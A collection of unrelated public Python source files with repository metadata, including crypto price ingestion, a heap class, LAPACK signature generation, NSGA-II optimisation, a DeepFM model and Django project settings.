counter_currency_code = next((code for code, counter_currency in COUNTER_CURRENCY_CHOICES if counter_currency == counter_curency_text), None)
if None in (source_code, counter_currency_code):
continue # skip this source or counter_currency
if subject == 'prices_volumes' and item['category'] == 'price':
try:
price = int(float(item['value']) * 10 ** 8) # convert to satoshi
Price.objects.create(
source=source_code,
transaction_currency=transaction_currency,
counter_currency=counter_currency_code,
price=price,
timestamp=item['timestamp']
)
#processed.append("{}/{}".format(transaction_currency, counter_currency_code))
# logger.debug(">>> Price saved: source={}, transaction_currency={}, counter_currency={}, price={}, timestamp={}".format(
# source_code, transaction_currency, counter_currency_code, price, item['timestamp']))
except Exception as e:
logger.debug(f">>>> Error saving Price for {item['symbol']} from: {item['source']}. {e}")
elif subject == 'prices_volumes' and item['category'] == 'volume':
try:
volume = float(item['value'])
Volume.objects.create(
source=source_code,
transaction_currency=transaction_currency,
counter_currency=counter_currency_code,
volume=volume,
timestamp=item['timestamp']
)
# logger.debug(">>> Volume saved: source={}, transaction_currency={}, counter_currency={}, volume={}, timestamp={}".format(
# source_code, transaction_currency, counter_currency_code, volume, item['timestamp']))
except Exception as e:
logger.debug(f">>>> Error saving Volume for {item['symbol']} from: {item['source']}. {e}")
elif subject == 'ohlc_prices':
try:
PriceHistory.objects.create(
source=source_code,
transaction_currency=transaction_currency,
counter_currency=counter_currency_code,
open_p=to_satoshi(item['popen']),
high=to_satoshi(item['high']),
low=to_satoshi(item['low']),
close=to_satoshi(item['close']),
timestamp=datetime.datetime.utcfromtimestamp(item['timestamp']),
volume=get_volume(item['bvolume'])
)
except IntegrityError as e:
pass
# logger.debug(f">>> Dublicated record for PriceHistory.\n{e}")
except Exception as e:
logger.debug(f">>>> Error saving PriceHistory for {item['symbol']} from: {item['source']}. {e}")
#logger.debug(f">>> OHLC history price saved. Source:{source_code}, {transaction_currency}_{counter_currency_code}")
#logger.debug("Message for {} saved to db. Coins: {}".format(get_source_name(source_code), ",".join(processed)))
logger.info(f"Message for {get_source_name(source_code)} ({subject}) saved to db")
# Little helpers
def to_satoshi(value):
try:
return int(float(value) * 10 ** 8)
except:
return None
def get_volume(value):
try:
return float(value)
except:
return None
|
[
"[email protected]"
] | |
dfb7a671ee5633e18c11d844bae922e69660677e
|
ca5339f667a5ef6a9faa149413d836cd3c1bb069
|
/heap.py
|
4436234f9e4cb9351b57f92847cf108f80802aff
|
[] |
no_license
|
alanlyyy/PythonHeaps
|
47b2baed57344d5e75328b55dfd3ae9b9d968e76
|
9732b45fb939d5538a3529d379953572ebc7f1af
|
refs/heads/master
| 2020-09-14T09:41:45.597355 | 2019-11-21T05:17:33 | 2019-11-21T05:17:33 | 223,093,523 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,418 |
py
|
#max number of items that can be stored in the heap
CAPACITY = 8
class HeapBase:
def __init__(self):
#create an array with capacity elements
self.heap = [0]*CAPACITY
#counter to keep track of num items in heap
self.heap_size = 0
#O(logN) because need to make sure heap propertises are not violated
def insert(self, item):
#if capacity is reached don't insert any more items
if CAPACITY == self.heap_size:
return
#insert the item + increment the counter
self.heap[self.heap_size] = item
self.heap_size += 1
#1. insert item to last position of array
#2. Validate heap properties are not violated
self.upHeap(self.heap_size-1)
#O(logN)
def upHeap(self, index):
"""check if node meets heap properties, otherwise swap nodes until the heap properties are met
going up the tree. (upheap)
"""
#get the parent index
parent_index = (index-1)//2 #integer division
#while root node is not reached and the parent node is smaller than child node
if index > 0 and self.heap[index] >self.heap[parent_index]:
#swap parent and child node
self.swap(index,parent_index)
#recursively go up the tree
self.upHeap(parent_index)
def swap(self, index1, index2):
self.heap[index2], self.heap[index1] = self.heap[index1], self.heap[index2]
#O(1)
def get_max(self):
#return the root node
return self.heap[0]
#O(logN)
def removeMax(self):
"""Return the max item + removes it from the heap.
Check if node is in correct position not violating heap properties.
"""
max = self.get_max()
#swap last element with root node
self.swap(0,self.heap_size-1)
#update the size
self.heap_size = self.heap_size - 1
#move the root node down the heap to not violate heap properties.
self.downHeap(0)
return max
def downHeap(self, index):
"""From the root node, swap the parent node with its children if
child nodes are larger than parent node. To insure heap properties are met.
"""
index_left = 2*index + 1
index_right = 2*index + 2
#max heap parent node is greater than child node
index_largest = index
#while heap is within size of array and left index is greater than parent node
if index_left < self.heap_size and self.heap[index_left] > self.heap[index]:
index_largest = index_left
#check if the right child is greater then the left child: largest is right node
if index_right < self.heap_size and self.heap[index_right] > self.heap[index_largest]:
index_largest = index_right
if index != index_largest:
#swap the parent node with child node
self.swap(index,index_largest)
#go down the heap with largest node
self.downHeap(index_largest)
def heap_sort(self):
"""Sort N nodes in heap.
Every removeMax operation called takes O(logN) because of downHeap()
Complete running time: O(N*logN)
"""
tempList = []
#store size of heap
size = self.heap_size
for i in range(0,size):
#call removeMax N times to return max element and remove max every iteration
max = self.removeMax()
tempList.append(max)
#print(max._key,max._value,max._price)
for i in range(0,size):
self.insert(tempList[i])
if __name__ == '__main__':
heap = HeapBase()
heap.insert(10)
heap.insert(8)
heap.insert(12)
heap.insert(20)
heap.insert(-2)
heap.insert(0)
heap.insert(1)
heap.insert(321)
heap.heap_sort()
|
[
"[email protected]"
] | |
cec69055122f7d6681aafa3340f9b1e6c99ab682
|
999879f8d18e041d7fa313132408b252aded47f8
|
/01-codes/scipy-master/scipy/linalg/_cython_signature_generator.py
|
3e32f4ee3bff69c241712515ab32a5fa027911ff
|
[
"MIT"
] |
permissive
|
QPanProjects/Surrogate-Model
|
ebcaf05728e82dcbcd924c2edca1b490ab085173
|
848c7128201218b0819c9665e2cec72e3b1d29ac
|
refs/heads/master
| 2022-10-11T19:03:55.224257 | 2020-06-09T14:37:35 | 2020-06-09T14:37:35 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,372 |
py
|
"""
A script that uses f2py to generate the signature files used to make
the Cython BLAS and LAPACK wrappers from the fortran source code for
LAPACK and the reference BLAS.
To generate the BLAS wrapper signatures call:
python _cython_signature_generator.py blas <blas_directory> <out_file>
To generate the LAPACK wrapper signatures call:
python _cython_signature_generator.py lapack <lapack_src_directory> <out_file>
"""
import glob
from numpy.f2py import crackfortran
sig_types = {'integer': 'int',
'complex': 'c',
'double precision': 'd',
'real': 's',
'complex*16': 'z',
'double complex': 'z',
'character': 'char',
'logical': 'bint'}
def get_type(info, arg):
argtype = sig_types[info['vars'][arg]['typespec']]
if argtype == 'c' and info['vars'][arg].get('kindselector') is not None:
argtype = 'z'
return argtype
def make_signature(filename):
info = crackfortran.crackfortran(filename)[0]
name = info['name']
if info['block'] == 'subroutine':
return_type = 'void'
else:
return_type = get_type(info, name)
arglist = [' *'.join([get_type(info, arg), arg]) for arg in info['args']]
args = ', '.join(arglist)
# Eliminate strange variable naming that replaces rank with rank_bn.
args = args.replace('rank_bn', 'rank')
return '{0} {1}({2})\n'.format(return_type, name, args)
def get_sig_name(line):
return line.split('(')[0].split(' ')[-1]
def sigs_from_dir(directory, outfile, manual_wrappers=None, exclusions=None):
if directory[-1] in ['/', '\\']:
directory = directory[:-1]
files = glob.glob(directory + '/*.f*')
if exclusions is None:
exclusions = []
if manual_wrappers is not None:
exclusions += [get_sig_name(l) for l in manual_wrappers.split('\n')]
signatures = []
for filename in files:
name = filename.split('\\')[-1][:-2]
if name in exclusions:
continue
signatures.append(make_signature(filename))
if manual_wrappers is not None:
signatures += [l + '\n' for l in manual_wrappers.split('\n')]
signatures.sort(key=get_sig_name)
comment = ["# This file was generated by _cython_wrapper_generators.py.\n",
"# Do not edit this file directly.\n\n"]
with open(outfile, 'w') as f:
f.writelines(comment)
f.writelines(signatures)
# The signature that is used for zcgesv in lapack 3.1.0 and 3.1.1 changed
# in version 3.2.0. The version included in the clapack on OSX has the
# more recent signature though.
# slamch and dlamch are not in the lapack src directory, but,since they
# already have Python wrappers, we'll wrap them as well.
# The other manual signatures are used because the signature generating
# functions don't work when function pointer arguments are used.
lapack_manual_wrappers = '''void cgees(char *jobvs, char *sort, cselect1 *select, int *n, c *a, int *lda, int *sdim, c *w, c *vs, int *ldvs, c *work, int *lwork, s *rwork, bint *bwork, int *info)
void cgeesx(char *jobvs, char *sort, cselect1 *select, char *sense, int *n, c *a, int *lda, int *sdim, c *w, c *vs, int *ldvs, s *rconde, s *rcondv, c *work, int *lwork, s *rwork, bint *bwork, int *info)
void cgges(char *jobvsl, char *jobvsr, char *sort, cselect2 *selctg, int *n, c *a, int *lda, c *b, int *ldb, int *sdim, c *alpha, c *beta, c *vsl, int *ldvsl, c *vsr, int *ldvsr, c *work, int *lwork, s *rwork, bint *bwork, int *info)
void cggesx(char *jobvsl, char *jobvsr, char *sort, cselect2 *selctg, char *sense, int *n, c *a, int *lda, c *b, int *ldb, int *sdim, c *alpha, c *beta, c *vsl, int *ldvsl, c *vsr, int *ldvsr, s *rconde, s *rcondv, c *work, int *lwork, s *rwork, int *iwork, int *liwork, bint *bwork, int *info)
void dgees(char *jobvs, char *sort, dselect2 *select, int *n, d *a, int *lda, int *sdim, d *wr, d *wi, d *vs, int *ldvs, d *work, int *lwork, bint *bwork, int *info)
void dgeesx(char *jobvs, char *sort, dselect2 *select, char *sense, int *n, d *a, int *lda, int *sdim, d *wr, d *wi, d *vs, int *ldvs, d *rconde, d *rcondv, d *work, int *lwork, int *iwork, int *liwork, bint *bwork, int *info)
void dgges(char *jobvsl, char *jobvsr, char *sort, dselect3 *selctg, int *n, d *a, int *lda, d *b, int *ldb, int *sdim, d *alphar, d *alphai, d *beta, d *vsl, int *ldvsl, d *vsr, int *ldvsr, d *work, int *lwork, bint *bwork, int *info)
void dggesx(char *jobvsl, char *jobvsr, char *sort, dselect3 *selctg, char *sense, int *n, d *a, int *lda, d *b, int *ldb, int *sdim, d *alphar, d *alphai, d *beta, d *vsl, int *ldvsl, d *vsr, int *ldvsr, d *rconde, d *rcondv, d *work, int *lwork, int *iwork, int *liwork, bint *bwork, int *info)
d dlamch(char *cmach)
void ilaver(int *vers_major, int *vers_minor, int *vers_patch)
void sgees(char *jobvs, char *sort, sselect2 *select, int *n, s *a, int *lda, int *sdim, s *wr, s *wi, s *vs, int *ldvs, s *work, int *lwork, bint *bwork, int *info)
void sgeesx(char *jobvs, char *sort, sselect2 *select, char *sense, int *n, s *a, int *lda, int *sdim, s *wr, s *wi, s *vs, int *ldvs, s *rconde, s *rcondv, s *work, int *lwork, int *iwork, int *liwork, bint *bwork, int *info)
void sgges(char *jobvsl, char *jobvsr, char *sort, sselect3 *selctg, int *n, s *a, int *lda, s *b, int *ldb, int *sdim, s *alphar, s *alphai, s *beta, s *vsl, int *ldvsl, s *vsr, int *ldvsr, s *work, int *lwork, bint *bwork, int *info)
void sggesx(char *jobvsl, char *jobvsr, char *sort, sselect3 *selctg, char *sense, int *n, s *a, int *lda, s *b, int *ldb, int *sdim, s *alphar, s *alphai, s *beta, s *vsl, int *ldvsl, s *vsr, int *ldvsr, s *rconde, s *rcondv, s *work, int *lwork, int *iwork, int *liwork, bint *bwork, int *info)
s slamch(char *cmach)
void zgees(char *jobvs, char *sort, zselect1 *select, int *n, z *a, int *lda, int *sdim, z *w, z *vs, int *ldvs, z *work, int *lwork, d *rwork, bint *bwork, int *info)
void zgeesx(char *jobvs, char *sort, zselect1 *select, char *sense, int *n, z *a, int *lda, int *sdim, z *w, z *vs, int *ldvs, d *rconde, d *rcondv, z *work, int *lwork, d *rwork, bint *bwork, int *info)
void zgges(char *jobvsl, char *jobvsr, char *sort, zselect2 *selctg, int *n, z *a, int *lda, z *b, int *ldb, int *sdim, z *alpha, z *beta, z *vsl, int *ldvsl, z *vsr, int *ldvsr, z *work, int *lwork, d *rwork, bint *bwork, int *info)
void zggesx(char *jobvsl, char *jobvsr, char *sort, zselect2 *selctg, char *sense, int *n, z *a, int *lda, z *b, int *ldb, int *sdim, z *alpha, z *beta, z *vsl, int *ldvsl, z *vsr, int *ldvsr, d *rconde, d *rcondv, z *work, int *lwork, d *rwork, int *iwork, int *liwork, bint *bwork, int *info)'''
if __name__ == '__main__':
from sys import argv
libname, src_dir, outfile = argv[1:]
# Exclude scabs and sisnan since they aren't currently included
# in the scipy-specific ABI wrappers.
if libname.lower() == 'blas':
sigs_from_dir(src_dir, outfile, exclusions=['scabs1', 'xerbla'])
elif libname.lower() == 'lapack':
# Exclude all routines that do not have consistent interfaces from
# LAPACK 3.1.0 through 3.6.0.
# Also exclude routines with string arguments to avoid
# compatibility woes with different standards for string arguments.
# Exclude sisnan and slaneg since they aren't currently included in
# The ABI compatibility wrappers.
exclusions = ['sisnan', 'csrot', 'zdrot', 'ilaenv', 'iparmq', 'lsamen',
'xerbla', 'zcgesv', 'dlaisnan', 'slaisnan', 'dlazq3',
'dlazq4', 'slazq3', 'slazq4', 'dlasq3', 'dlasq4',
'slasq3', 'slasq4', 'dlasq5', 'slasq5', 'slaneg',
# Routines deprecated in LAPACK 3.6.0
'cgegs', 'cgegv', 'cgelsx', 'cgeqpf', 'cggsvd', 'cggsvp',
'clahrd', 'clatzm', 'ctzrqf', 'dgegs', 'dgegv', 'dgelsx',
'dgeqpf', 'dggsvd', 'dggsvp', 'dlahrd', 'dlatzm', 'dtzrqf',
'sgegs', 'sgegv', 'sgelsx', 'sgeqpf', 'sggsvd', 'sggsvp',
'slahrd', 'slatzm', 'stzrqf', 'zgegs', 'zgegv', 'zgelsx',
'zgeqpf', 'zggsvd', 'zggsvp', 'zlahrd', 'zlatzm', 'ztzrqf']
sigs_from_dir(src_dir, outfile, manual_wrappers=lapack_manual_wrappers,
exclusions=exclusions)
|
[
"[email protected]"
] | |
8458f4465852fe16d436942d35b6d77d1c651164
|
706f13fdcf9661040158a9effbfdf5a93ca95ac9
|
/app9.py
|
ca3e3fca0ccdb34a8f7f8eded59d6a328f50f27b
|
[] |
no_license
|
123shukla/samy-web
|
200eb47dca17a810bfc1474e0cfcefad54930d2a
|
6d0fe06db54d19201a30e30c3c819ab6340bafcf
|
refs/heads/main
| 2022-12-29T05:40:28.982799 | 2020-10-13T07:31:05 | 2020-10-13T07:31:05 | 303,619,403 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 380 |
py
|
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
from app import app
layout = html.Div([
html.H3('Node 9'),
dcc.Link('Go to Node 2', href='/apps/app2'),
html.Br(),
dcc.Link('Go to Node 15', href='/apps/app15'),
html.Br(),
dcc.Link('Go to Node 10', href='/apps/app10'),
])
|
[
"[email protected]"
] | |
c1749a91a063e221eaf223f62ef9141b352ea7b7
|
39fbbfd88540111850c4591e70f1dd35d4ca4634
|
/test-nsga2.py
|
ab530f516329acf77ef053a20130c5cb740c5093
|
[] |
no_license
|
Robert-MYM/Nuaa_ASE-Project_one
|
7166f2cc0e0886491fc1e9e22ab0f648fd538498
|
cc2a7e81b759b5f8f15f5d1c55e0f82375f76cb9
|
refs/heads/master
| 2020-06-01T02:14:33.083619 | 2019-06-11T08:57:36 | 2019-06-11T08:57:36 | 190,593,327 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,033 |
py
|
from jmetal.algorithm.multiobjective.nsgaii import NSGAII
from jmetal.operator import BinaryTournamentSelection, BitFlipMutation, SPXCrossover,PolynomialMutation,SBXCrossover
from jmetal.problem.multiobjective.unconstrained import OneZeroMax
from jmetal.util.comparator import RankingAndCrowdingDistanceComparator, DominanceComparator
from jmetal.util.observer import ProgressBarObserver, VisualizerObserver
from jmetal.util.solution_list import print_function_values_to_file, print_variables_to_file
from jmetal.util.termination_criterion import StoppingByEvaluations
import ZDT1,DTLZ1,HRES
if __name__ == '__main__':
#binary_string_length = 512
#problem = OneZeroMax(binary_string_length)
#problem = ZDT1.ZDT1()
problem = HRES.HRES()
max_evaluations = 50000
algorithm = NSGAII(
problem=problem,
population_size=100,
offspring_population_size=100,
#mutation=BitFlipMutation(probability=1.0 / binary_string_length),
mutation=PolynomialMutation(probability=1.0/problem.number_of_variables,distribution_index=20),
#crossover=SPXCrossover(probability=1.0),
crossover=SBXCrossover(probability=1.0,distribution_index=20),
selection=BinaryTournamentSelection(comparator=RankingAndCrowdingDistanceComparator()),
termination_criterion=StoppingByEvaluations(max=max_evaluations),
#dominance_comparator=DominanceComparator()
)
algorithm.observable.register(observer=ProgressBarObserver(max=max_evaluations))
algorithm.observable.register(observer=VisualizerObserver())
algorithm.run()
front = algorithm.get_result()
# Save results to file
print_function_values_to_file(front, 'FUN.' + algorithm.get_name() + "-" + problem.get_name())
print_variables_to_file(front, 'VAR.' + algorithm.get_name() + "-" + problem.get_name())
print('Algorithm (continuous problem): ' + algorithm.get_name())
print('Problem: ' + problem.get_name())
print('Computing time: ' + str(algorithm.total_computing_time))
|
[
"[email protected]"
] | |
03bf0178032d170f8e311d11f4a3aa46d2dc98ba
|
caae8bec3b48d2805c2b1bd9db053026bf78d074
|
/tests/test.py
|
fb364def5456abb9fb01ce116e5a44365e35131e
|
[
"MIT"
] |
permissive
|
worldwidekatie/study_guide
|
69ccbeaef7c5a6ce5fbeffa7b115d20dfe42a843
|
bc7a67f331990d07463c6ac9413eef283e555ad0
|
refs/heads/master
| 2022-06-19T14:14:54.225242 | 2020-05-07T22:58:16 | 2020-05-07T22:58:16 | 262,132,903 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 220 |
py
|
import unittest
from ..my_studyguide.math1 import Math1
class Math1Tests(unittest.TestCase):
def test_addition(self):
self.assertEqual(Math1.addition, 30)
if __name__ == "__main__":
unittest.main()
|
[
"[email protected]"
] | |
97f76feb72609a46af6c644c9ed643b1a6dd4f6f
|
8e2648e3ec0f777ba47f0688e455f2a997e1da05
|
/com/shujia/day1/demo5.py
|
1e20db33ef2e7956f9d5c154dd5b094d7174ec61
|
[] |
no_license
|
MLlibfiy/python
|
c3ac27e81943bc669624198b6ac9c753c067f054
|
1d088bf3f9111185001230de0ee06bc760dc8ae8
|
refs/heads/master
| 2020-04-13T03:52:46.129152 | 2018-12-29T02:48:26 | 2018-12-29T02:48:26 | 162,944,627 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 468 |
py
|
# coding=utf-8
if __name__ == '__main__':
# 集合 无序,不唯一
set1 = {"shu", "jia", 1, "a", "a"}
print set1
# 创建空的集合
set2 = set()
set2.add("java")
set2.add("java")
set2.add("java")
set2.add("scala")
print set2
set4 = {1, 2, 3, 4, 5, 6}
set5 = {4, 5, 6, 7, 8, 9}
print set4 | set5 # 并集
print set4 & set5 # 交集
print set4 - set5 # 差集
print set4 ^ set5 # 对称集
|
[
"[email protected]"
] | |
03e0224bd1d127b915a20878ed3192e0ad6658fd
|
904a13bb38e8f73dba4081becf41dbeea0ea21d5
|
/scripts/export_titers_for_auspice_v1.py
|
7b6c15cbf368f005a93b86cad9cf35d61656706e
|
[] |
no_license
|
nextstrain/seasonal-flu
|
a78bc645d5dc4e1c73b5acdb7e2ddd9ea8f88f19
|
48a0ed2aecb6ea16b2483f136f718c618fdfd1e7
|
refs/heads/master
| 2023-08-04T06:31:08.278580 | 2023-08-01T18:56:29 | 2023-08-01T18:56:29 | 154,029,525 | 35 | 20 | null | 2023-09-08T22:19:40 | 2018-10-21T16:36:00 |
Python
|
UTF-8
|
Python
| false | false | 1,193 |
py
|
#!/usr/bin/env python3
import argparse
import json
if __name__ == '__main__':
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("--titers-sub")
parser.add_argument("--titers-tree")
parser.add_argument("--output-titers")
parser.add_argument("--output-titers-sub")
parser.add_argument("--output-titers-tree")
args = parser.parse_args()
with open(args.titers_sub) as fh:
sub = json.load(fh)
with open(args.output_titers_sub, 'wt') as sub_file:
json.dump({'avidity': sub['avidity'],
'potency': sub['potency'],
'substitution': sub['substitution']},
sub_file, indent=1)
with open(args.output_titers, 'wt') as raw_file:
json.dump(sub['titers'], raw_file, indent=1)
with open(args.titers_tree) as fh:
tree = json.load(fh)
with open(args.output_titers_tree, 'wt') as tree_file:
json.dump({'avidity': tree['avidity'],
'potency': tree['potency'],
'dTiter': {k:v['dTiter'] for k,v in tree['nodes'].items()}},
tree_file, indent=1)
|
[
"[email protected]"
] | |
efc9f072d5d8de144abc02d994905ccb7de0c700
|
db3981b8d30db9ec0e3ee8242ed918a7c5988aa1
|
/AlgoDescription.py
|
7908a1dec8a3dfde8cd874ba98bc226dc031c26d
|
[] |
no_license
|
nigamv/datasciencetool
|
eebacbd412a2febad87bbf2848127137519431a4
|
b70c9446a8f9c41a3e1dc257bb8633e3f5737ff6
|
refs/heads/master
| 2020-03-29T13:01:07.500757 | 2019-05-29T20:37:55 | 2019-05-29T20:37:55 | 149,935,719 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 370 |
py
|
'''
Created on Feb 11, 2016
@author: vibhor
'''
class AlgoDescription:
algorithms =("There are various algorithms available for processing data and getting desired outputs."
"These algorithms are divided in two different ways, supervised and un-supervised learning algorithm "
"and regression and classification algorithms.")
|
[
"[email protected]"
] | |
ff06a8c08e99f929e422c16fb959c283ab298bbe
|
0c6488fd370f8d0e18173ab77eb9443fd61d0576
|
/easy_rec/python/model/deepfm.py
|
f17bec0beb1edaf64e7f166e11d23c14d57b7fca
|
[
"Apache-2.0"
] |
permissive
|
geogubd/EasyRec
|
96a6d32d2795057cc69d5ba4e8948033bdd3e308
|
d4bfd3b40bce1b990a9206112a9429dbd262a116
|
refs/heads/master
| 2023-09-04T02:59:28.832855 | 2021-10-18T05:19:56 | 2021-10-18T05:19:56 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,459 |
py
|
# -*- encoding:utf-8 -*-
# Copyright (c) Alibaba, Inc. and its affiliates.
import tensorflow as tf
from easy_rec.python.layers import dnn
from easy_rec.python.layers import fm
from easy_rec.python.layers import input_layer
from easy_rec.python.model.rank_model import RankModel
from easy_rec.python.protos.deepfm_pb2 import DeepFM as DeepFMConfig
if tf.__version__ >= '2.0':
tf = tf.compat.v1
class DeepFM(RankModel):
def __init__(self,
model_config,
feature_configs,
features,
labels=None,
is_training=False):
super(DeepFM, self).__init__(model_config, feature_configs, features,
labels, is_training)
assert self._model_config.WhichOneof('model') == 'deepfm', \
'invalid model config: %s' % self._model_config.WhichOneof('model')
self._model_config = self._model_config.deepfm
assert isinstance(self._model_config, DeepFMConfig)
# backward compatibility
if self._model_config.HasField('wide_regularization'):
tf.logging.warn(
'wide_regularization is deprecated, please use l2_regularization')
self._wide_features, _ = self._input_layer(self._feature_dict, 'wide')
self._deep_features, self._fm_features = self._input_layer(
self._feature_dict, 'deep')
if 'fm' in self._input_layer._feature_groups:
_, self._fm_features = self._input_layer(self._feature_dict, 'fm')
def build_input_layer(self, model_config, feature_configs):
# overwrite create input_layer to support wide_output_dim
has_final = len(model_config.deepfm.final_dnn.hidden_units) > 0
if not has_final:
assert model_config.deepfm.wide_output_dim == model_config.num_class
self._input_layer = input_layer.InputLayer(
feature_configs,
model_config.feature_groups,
model_config.deepfm.wide_output_dim,
use_embedding_variable=model_config.use_embedding_variable,
embedding_regularizer=self._emb_reg,
kernel_regularizer=self._l2_reg)
def build_predict_graph(self):
# Wide
wide_fea = tf.reduce_sum(
self._wide_features, axis=1, keepdims=True, name='wide_feature')
# FM
fm_fea = fm.FM(name='fm_feature')(self._fm_features)
# Deep
deep_layer = dnn.DNN(self._model_config.dnn, self._l2_reg, 'deep_feature',
self._is_training)
deep_fea = deep_layer(self._deep_features)
# Final
if len(self._model_config.final_dnn.hidden_units) > 0:
all_fea = tf.concat([wide_fea, fm_fea, deep_fea], axis=1)
final_dnn_layer = dnn.DNN(self._model_config.final_dnn, self._l2_reg,
'final_dnn', self._is_training)
all_fea = final_dnn_layer(all_fea)
output = tf.layers.dense(
all_fea,
self._num_class,
kernel_regularizer=self._l2_reg,
name='output')
else:
if self._num_class > 1:
fm_fea = tf.layers.dense(
fm_fea,
self._num_class,
kernel_regularizer=self._l2_reg,
name='fm_logits')
else:
fm_fea = tf.reduce_sum(fm_fea, 1, keepdims=True)
deep_fea = tf.layers.dense(
deep_fea,
self._num_class,
kernel_regularizer=self._l2_reg,
name='deep_logits')
output = wide_fea + fm_fea + deep_fea
self._add_to_prediction_dict(output)
return self._prediction_dict
|
[
"[email protected]"
] | |
54dda2fd3569a59243cb0d5b8b7dda99f42080cb
|
ad6ffe99c0ec781b0bb286ce5cb10ca3735bde97
|
/hello-docstring.py
|
6af55db124aa30b82bd510f054f9bb043640e19d
|
[
"MIT"
] |
permissive
|
crunchy-devops/tp-bac-4
|
db7f9ac3824bfcf7cd8b3570c6d45284be53b9d0
|
4784d9c0505ad62bcad7b28d536826126ded435c
|
refs/heads/master
| 2023-02-26T09:18:31.182264 | 2021-02-01T09:26:27 | 2021-02-01T09:26:27 | 330,283,640 | 0 | 10 | null | null | null | null |
UTF-8
|
Python
| false | false | 118 |
py
|
#!/usr/bin/env python3
"""
Author: Herve Meftah <[email protected]>
Purpose: Say hello
"""
print('Hello, World!')
|
[
"[email protected]"
] | |
50664041a00a4b4add3e5bafe2d2107d1fb5a4e5
|
43c398156b5fdab29a533d97e612a242aa2f4a75
|
/Intern/Demo/Demo/settings.py
|
8ec3c8dc64f8d65796d1637c1225e11f8402e312
|
[] |
no_license
|
shahriya2402/leave_management_system
|
7f501d8c5470d4e7499c65ebf96ab793c8e38cdb
|
be665cf0bb48a30868967dc874ebabb8d770139a
|
refs/heads/main
| 2023-04-14T17:53:17.809060 | 2021-05-04T10:23:58 | 2021-05-04T10:23:58 | 364,204,874 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,161 |
py
|
"""
Django settings for Demo project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
import mimetypes
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
from django.contrib import messages
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-5iprpo!b*uki216i2%n!7$2e+rw_k8+t3rj23c)e+-9d$d3k^b'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'leave.apps.LeaveConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'Demo.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'Demo.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'management',
'USER': 'root',
'PASSWORD': '',
'HOST': 'localhost',
'PORT': '3306',
'OPTIONS': {
'init_command': "SET sql_mode='STRICT_TRANS_TABLES'"
}
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
MEDIA_ROOT = 'static/img'
MEDIA_URL = '/img/'
STATIC_URL = '/static/'
STATICFILES_DIRS = [
BASE_DIR / "static",
'/var/www/static/',
]
mimetypes.add_type("text/css", ".css", True)
mimetypes.add_type("text/javascript", ".js", True)
MESSAGE_TAGS = {
messages.ERROR: 'danger'
}
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
MEDIA_ROOT = 'static/img'
MEDIA_URL = '/img/'
STATIC_URL = '/static/'
STATICFILES_DIRS = [
BASE_DIR / "static",
'/var/www/static/',
]
mimetypes.add_type("text/css", ".css", True)
mimetypes.add_type("text/javascript", ".js", True)
MESSAGE_TAGS = {
messages.ERROR: 'danger'
}
|
[
"[email protected]"
] | |
c55f78c2df8746a0df7070531eb25fabfb0272d6
|
845c4bd2ff1aba9172cb760a1b77dc1fa5b2ce3d
|
/doc/conf.py
|
c310bca4c701a40c5e2b3d88b3090edb922701a8
|
[] |
no_license
|
fmi-tools/py-fmipp
|
0cea73658f07f675b09edae6ba6325cda6bdc87e
|
e39b80c65e375832c6839a7c2a9edb4117ae409d
|
refs/heads/master
